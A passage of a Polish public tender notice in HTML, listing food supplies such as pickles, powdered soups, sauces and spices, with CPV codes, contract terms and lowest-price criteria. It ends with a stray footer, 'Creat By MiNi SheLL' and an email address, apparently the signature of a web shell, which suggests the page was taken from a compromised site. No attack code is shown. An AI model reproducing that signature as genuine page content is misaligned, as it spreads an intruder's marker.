20. Przecier ogórkowy 15331000-7	Skład: ogórki kwaszone przetarte, przyprawy. Produkt pasteryzowany. Op. jedn. 320-350ml, Masa netto nie mniej niż 280g. kg	30
21. Szczaw konserwowy 15331400-1	Szczaw konserwowy pasteryzowany. Skład: liść szczawiu, przyprawy smakowe. Op. jedn. 320ml. Masa netto nie mniej niż  280g. kg	50
22. Pomidory krojone	Pomidory krojone. Skład: pomidory nie mniej niż  60%, sok pomidorowy nie mniej niż 39 %. Op. jedn. Puszka 2,5-3 kg Typu  Pudliszki lub równoważne. kg 30.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.33.21.00-5, 15.33.14.62-3, 15.33.11.10-1, 15.33.14.27-6, 15.33.14.70-2, 15.33.31.10-1, 15.33.15.00-2, 15.33.11.36-9, 15.33.22.90-3, 15.30.00.00-1, 15.33.14.61-6, 15.33.11.10-1, 15.33.14.64-7, 15.33.11.35-2, 15.33.10.00-7, 15.33.14.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Dostawy zup i sosów w proszku..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Zupa borowikowa 15891400-4 Zupa krem z borowików. Op.  jedn. 1-3 kg Składniki: mąka pszenna, tłuszcz roślinny, skrobia,  borowiki suszone nie mniej niż 5%, białka mleka, ekstrakt grzybowy suszony (pieczarki, borowiki) nie mniej niż  2,9 %; cebula suszona,  aromaty, natka pietruszki, pieprz. PN-A-94052	 kg30
2. Zupa szparagowa 15891400-4 Op.  jedn. 1- 3 kg. Składniki: skrobia, tłuszcz roślinny, szparagi suszone nie mniej niż 8 %, mąka pszenna, cebula suszona, cukier, białka mleka, PN-A-94052 kg 30
3. Zupa pieczarkowa 15891400-4	Op. jedn. 1- 3 kg. Składniki: mąka pszenna, tłuszcz roślinny, ekstrakt z pieczarek nie mniej niż 2 %, pieczarki suszone nie mniej niż1,5%, cebula prażona, aromaty, pieprz. PN-A-94052 kg 30
4. Żurek w proszku 15891400-4	Op. jedn.1 - 3kg. Składniki: skrobia, mleko odtłuszczone w proszku, mąka żytnia nie mniej niż 14,5 %, sól, płatki ziemniaczane, boczek wieprzowy wędzony prażony nie mniej niż 5,%, tłuszcz roślinny, cebula prażona, ekstrakt drożdżowy, suszony, czosnek, majeranek, liść laurowy, pieprz. PN-A-94052 kg 40
5. Sos myśliwski 15871200-6	Op.  jedn. 0,5-2 kg. Składniki: zasmażka( mąka pszenna, tłuszcz roślinny, boczek wieprzowy wędzony prażony nie mniej niż 5,5 %, pieczarki suszone nie mniej niż 5 %, sól, tłuszcz roślinny, substancje wzmacniające smak i zapach, cebula suszona nie mniej niż 2,5%,  liść laurowy, majeranek. PN-A-94050 kg	 30
6.Rosół z kury 15871200-6	Op.  jedn. 1 - 3 kg Składniki: sól , substancje wzmacniające smak i zapach, tłuszcz kurzy (2- 8%), aromaty ( w tym pochodne mleka i jaj), skrobia, mięso kurze suszone (0,6-2 %), cebula prażona, przyprawy, pieprz biały, gałka muszkatołowa.kg 30
7.Sos pieczarkowo-borowikowy 15871200-6	Op.  jedn. 0,5-2kg. Składniki: zasmażka, ( mąka pszenna, tłuszcz roślinny), tłuszcz roślinny, sól, ekstrakt z pieczarek suszony nie mniej niż 4 %, białka mleka, substancje wzmacniające smak i zapach, pieczarki suszone nie mniej niż 1,5%, borowiki suszone nie mniej niż1 %, mąka pszenna, ekstrakt drożdżowy suszony, aromaty, natka pietruszki suszona, cukier,  PN-A-94050 kg 30
8.Sos sałatkowy ogrodowy 15871200-6	Op. jedn. 0,5-2kg. Składniki: laktoza, sól, cukier,  natka pietruszki, gorczyca, szczypiorek, cebula, olej roślinny, ekstrakt drożdżowy suszony, pieprz,  czosnek. PN-A-94050 kg 30
9. Sos z zielonym pieprzem  15871200-6	Op. jedn. 0,5-2 kg Składniki: zasmażka ( mąka pszenna, tłuszcz roślinny, ) sól, tłuszcz roślinny, ; aromaty ( w tym pszenica) , cukier, pieprz zielony liofilizowany nie mniej niż 1,5%), pieprz, czosnek,  majeranek PN-A-94050 kg 30
10. Zupa brokułowa 15891400-4	Op. jedn. 1- 3kg. Składniki: mąka pszenna, skrobia, sól, tłuszcz roślinny,  brokuły suszone  nie mniej niż 6 %,  białka mleka, cukier, aromaty, cebula suszona, ekstrakt drożdżowy suszony, pieprz,  gałka muszkatołowa. PN-A-94052 kg 30
11. Sos grzybowy 15871200-6	Op. jedn. 0,5-2kg. Składniki: zasmażka ( mąka pszenna, tłuszcz roślinny),  tłuszcz roślinny, laktoza, pieczarki suszone nie mniej niż 4 %, sól, białka mleka, ekstrakt grzybowy suszony, (pieczarka, borowik) nie mniej niż 2,5 %,  smak i zapach; glutaminian sodu, mąka pszenna, borowiki suszone nie mniej niż 1,5%, aromaty, ekstrakt drożdżowy suszony, barwnik;  PN-A-94050 kg	15
12. Zupa porowa 15891400-4	Op. jedn. 1-3 kg Składniki: mąka pszenna, tłuszcz roślinny, sól, skrobia, por suszony nie mniej niż 6,5%, substancja wzmacniająca smak i zapach. PN-A-94050	kg	30
13. Sos tomato pronto 15894000-1	Op. jedn. 1-3 kg Baza sosu pomidorowego z kawałkami pomidorów o płynnej konsystencji. Składniki: pomidory  nie mniej niż 78%, koncentrat pomidorowy  nie mniej niż 18 %, olej roślinny, sól, cukier, cebula suszona,  PN-A-94050 kg 30
14. Sos do spagetti 15871200-6	Sos do spagetti Bolognese. Op. jedn. 0,5-2kg PN-A94050 kg	30 15. Sos węgierski 15871200-6 Op. jedn. 0,5-2kg. Składniki: pomidory suszone nie mniej niż 31 %, sól, cukier, tłuszcz roślinny, papryka  nie mniej niż 4%, boczek wędzony prażony nie mniej niż 3,4%,  skrobia, cebula suszona, pieprz czarny,  PN-A-94050	kg 15.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.89.14.00-4, 15.87.12.00-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 01.02.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Dostawy przypraw.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przyprawa do potraw    15871270-7	Przyprawa warzywna do zup potraw mięsnych i ryb. Skład: zawartość soli nie więcej niż55%, warzywa suszone nie mniej niż15%, marchew, cebula, pasternak, seler, natka pietruszki, por, substancje wzmacniające smak i zapach.; cukier pieprz czarny, ekstrakt drożdżowy.  Op. jedn. 150 - 200g. Typu  Kucharek  lub równoważna. PN 86 A-9400 kg 70
2. Gałka muszkatołowa 15872000-1	Gałka muszkat. mielona. Op.  jedn. 10g. kg 1
3. Żelatyna spożywcza 15890000-3	Żelatyna spożywcza. Op. jedn. 30 50g. PN-93 A-82245 kg 10
4. Cynamon  15872000-1	Cynamon mielony. Barwa jasnobrązowa do brunatnej, jednolita. Zapach swoisty, intensywny, bez zapachów obcych. Smak słodko- piekący, bez posmaków obcych. Przyprawa o silnym balsamicznym zapachu oraz ostrym, korzennym, gorzkawym i zarazem słodkim smaku. Op. jedn. 15-20g. BN-68 8132-09 kg 2
5. Delikata do ryb 15871270-7 Op. jedn. 0,5-1kg. Składniki: sól, cebula suszona 18%, substancja wzmacniająca smak i zapach: glutaminian sodu; pieprz, natka pietruszki, koper, mąka pszenna, regulator kwasowości: kwas cytrynowy, czosnek 2,3%, olej roślinny, tymianek, imbir. kg 15
6.Delikata do mięs 15871270-7 Op. jedn. 0,5-1kg. Składniki: substancja wzmacniająca smak i zapach: glutaminian sodu, sól, mąka pszenna, papryka mielona, czosnek, natka pietruszki, rozmaryn, pieprz, oregano, tymianek, majeranek, papryka ostra, cebula suszona, cukietr, pomidory suszone, olej roślinny, barwniki: karmel amoniakalny,, ekstrakt z papryki, aromat, substancja przeciwzbrylająca: dwutlenek krzemu. Przyprawa bez konserwantów. kg 10
7.Liść laurowy 15872000-8	Liść laurowy suszony. Op.jedn.5-10g	kg 1
8. Majeranek  15872000-8	Przyprawa ziołowa. Mieszanina liści i kwiatów o intensywnym, charakterystycznym zapachu i smaku. Op.jedn.7-10g PN-A-86957,1997 kg 5
9. Ocet spirytusowy 10%        15871120-1	Op. jedn. 0,5 l PN-A-79733	l 70
10.Papryka mielona słodka      15872010-2	Przyprawa ziołowa. Barwa czerwona. Smak słodkawy, mało wyczuwalny, lekko piekący. Op. jedn.  20 - 100g PN-A-86955 kg 8
11. Pieprz czarny 15872100-2 Pieprz czarny mielony, naturalny. Przyprawa o charakterystycznym ostrym smaku, stosowana do wszelkiego rodzaju potraw mięsnych i rybnych, zup, bulionów, sosów, warzyw oraz sałatek i marynat. Op. jedn. 5-25g PN-A-86965 kg 15
12. Przyprawa do mięsa 15871270-7	Przyprawa do mięs i innych potraw Delikat lub równoważna. Składniki: substancja wzmacniająca smak i zapach: glutaminian sodu; sól, mąka pszenna, papryka mielona, czosnek, natka pietruszki, rozmaryn, pieprz, oregano, tymianek, majeranek, papryka ostra, cebula suszona, cukier, pomidory suszone, olej roślinny, barwniki, aromat, substancja przeciwzbrylająca. Op.jedn.30- 100g 	kg 18
13. Przyprawa do ryb 15871270-7	Op. jedn 20-30g	kg 5
14. Przyprawa do zup w płynie uniwersalna 15871270-7	Skład: hydrolizat białkowy, glutaminian, sól, woda, przyprawy smakowe. Op. jedn . 1 kg PN-A-94052 kg 120
15. Przyprawa do potraw poddawanych obróbce termicznej 15871270-7Przyprawa do potraw poddawanych obróbce termicznej - przyprawa do mięs o zawartości soli nie więcej niż 40%, op. jedn.  150g, 250g. Typu Jarzynka lub równoważny PN-A-79011-8	kg 70
16. Ziele angielskie 15872000-8	Ziele angielskie - przyprawa ziołowa. Op.jedn 15g BN-67 8132-14 kg 2
17. Zioła prowansalskie 15871270-7	Skład: bazylia, majeranek,rozmaryn, szałwia, czomber, oregano, tymianek, mięta. Kamis lub równoważna. Op. jedn. 10-30g BN-77/8132-17 kg 1
18.  Tymianek 15872000-8	Op. jedn.10-30g. Wysuszone ziele tymianku pospolitego PN-ISO 6754:1999 kg 1
19. Przyprawa do kurczaka   15871270-7	Przyprawa do kurczaka. Mieszanka przypraw ziołowych i korzennych. Skład: curry, papryka słodka, chili, czosnek, imbir, pieprz czarny, sól. Barwa niejednolita, charakterystyczna dla użytych składników. Smak swoisty bez posmaków obcych. Op. jedn. 30-40g	 kg 8
20. Przyprawa gyros 15871270-7	Przyprawa kebab-gyros. Kompozycja wielu przypraw. Skład mieszanki: sól, czosnek, papryka słodka, wzmacniacz smakuglutaminian sodu, papryka ostra, cebula, cząber, rozmaryn, tymianek, kolendra, curry, gałka muszkatalowa, ziele angielskie, oregano, bazylia, majeranek. Op. jedn. 20-40g PN 86 A-9400 kg 2
21. Kwasek cytrynowy 15890000-8	Kwasek cytrynowy spożywczy. Kryształy sypkie, bez zlepów i grudek. Kryształy bezbarwne bez obcego zapachu. Smak kwaśny.Op.jedn do 100g. PN-81 A-79734 kg 8
22. Przyprawa curry 15871270-7 Kompozocja ziół, przypraw i suszonych warzyw o charakterystycznym, pikantnym aromacie i smaku. Op. jedn. 20-40g. Prymat lub równoważna. kg 1
23. Sól jodowana 15872400-5 Sól warzona, próżniowa, jodowana do celów spożywcza. Składniki: chlorek sodu  NaCl  min. 99,0 %. Substancja przeciwzbryl. E 536 do 1 mg 100g, Jodan potasu 3,9?1,3 mg/100g. Op.  jedn. 1 kg PN- C 84081-2;1998 kg 250
24. Sól czosnkowa 15842400-6 Sól czosnkowa jodowana. Skład: sól jodowana (zawartość jodku potasu 30 ? 10 mg kg soli), czosnek - 30%. Op.j edn 20-40g kg 5
25. Czosnek granulowany 15331390-9	Czosnek granulowany- przyprawa o charakteryst. smaku i aromacie do tłust. mięs, zup i sosów. Op.jedn 20-40g	kg 3
26. Przyprawa do potraw     15871270-7	Przyprawa warzywna do potraw poddawanych obróbce termicznej typu Vegeta   lub równoważna. Składniki: zawartość soli nie więcej niż 40 %, suszone warzywa nie mniej niż15%(marchew, pasternak, cebula, seler, natka pietruszki), substancje wzmacniające smak i zapach. Op.jedn.150-200g PN 86 PN-9400 kg	70.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 15.00.00.00-8, 15.87.12.70-7, 15.87.20.00-1, 15.89.00.00-3, 15.87.20.00-8, 15.87.20.10-2, 15.87.11.20-1, 15.89.00.00-8, 15.87.24.00-5, 15.84.24.00-6, 15.33.13.90-9.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Okres w miesiącach: 12.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com